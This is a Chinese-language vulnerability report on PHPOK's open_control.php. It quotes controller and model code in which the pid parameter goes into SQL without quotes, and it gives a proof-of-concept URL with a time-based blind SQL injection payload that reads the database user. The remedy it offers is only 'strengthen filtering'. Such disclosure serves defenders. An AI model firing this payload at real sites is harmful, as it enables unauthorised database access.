在framework/www/open_control.php中:

//网址列表，这里读的是项目的网址列表
function url_f()
{
$id = $this->get("id");
if(!$id) $id = "content";
$this->assign("id",$id);
$pid = $this->get("pid");
if($pid)
{
$p_rs = $this->model('project')->get_one($pid);
$type = $this->get("type");
if(!$p_rs)
{
error_open("项目不存在");
}
if($type == "cate" && $p_rs["cate"])
{
$catelist = $this->model("cate")->get_all($p_rs['site_id'],$p_rs['cate']);
$this->assign("rslist",$catelist);
$this->assign("p_rs",$p_rs);
$this->view("open_url_cate");
}
else
{
$pageid = $this->get($this->config["pageid"],"int");
$psize = $this->config["psize"];
if(!$psize) $psize = 20;
if(!$pageid) $pageid = 1;
$offset = ($pageid - 1) * $psize;
$pageurl = $this->url("open","url","pid=".$pid."&type=list&id=".$id);
$condition = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id='0' ";
$keywords = $this->get("keywords");
if($keywords)
{
$condition .= " AND l.title LIKE '%".$keywords."%' ";
$pageurl .= "&keywords=".rawurlencode($keywords);
$this->assign("keywords",$keywords);
}
$rslist = $this->model('list')->get_list($p_rs["module"],$condition,$offset,$psize,$p_rs["orderby"]);
if($rslist)
{
$sub_idlist = array_keys($rslist);
$sub_idstring = implode(",",$sub_idlist);
$con_sub = "l.site_id='".$p_rs["site_id"]."' AND l.project_id='".$pid."' AND l.parent_id IN(".$sub_idstring.") ";
$sublist = $this->model('list')->get_list($p_rs["module"],$con_sub,0,0,$p_rs["orderby"]);
if($sublist)
{
foreach($sublist AS $key=>$value)
{
$rslist[$value["parent_id"]]["sonlist"][$value["id"]] = $value;
}
}
}
//读子主题
$total = $this->model('list')->get_total($p_rs["module"],$condition);
$pagelist = phpok_page($pageurl,$total,$pageid,$psize,"home=首页&prev=上一页&next=下一页&last=尾页&half=5&opt=第(num)页&add=(total)/(psize)&always=1");
$this->assign("pagelist",$pagelist);
$this->assign("p_rs",$p_rs);
$this->assign("rslist",$rslist);
$this->view("open_url_list");
}
}
else
{
$condition = " p.status='1' ";
$rslist = $this->model('project')->get_all_project($_SESSION["admin_site_id"],$condition);
$this->assign("rslist",$rslist);
}
$this->assign("id",$id);
$this->view("open_url");
}

$pid = $this->get("pid"); 获取参数pid的值，然后调用下面的方法

$p_rs = $this->model('project')->get_one($pid);

//取得项目信息
function get_one($id,$ext=true)
{
if(!$id) return false;
$sql = "SELECT * FROM ".$this->db->prefix."project WHERE id=".$id;
$rs = $this->db->get_one($sql);
if(!$rs) return false;
if($ext)
{
$ext_rs = $GLOBALS['app']->model("ext")->get_all("project-".$id);
if($ext_rs) $rs = array_merge($ext_rs,$rs);
}
return $rs;
}

这里发现$id 虽然做了全局的过滤，但是sql语句中并没有两侧加上引号，这样过滤就没啥意义了，直接可以sql整形注入。

PS： 这里还有一个奇怪的问题，访问页面后发现一只提示模板不存在，后来发现在tpl文件夹下根本就不存在这个open_control.php中所需要的模板。导致sql注入无法回显。不知道是否是开发者忘记了还是这个模块已经取消了。

poc:

/index.php?c=open&f=url&pid=0%20or%20if%28ord%28substr%28user%28%29%2C1%2C1%29%29%3D1%2Csleep%28%200.5%29%2C1%29%3D0

解决方案：

加强过滤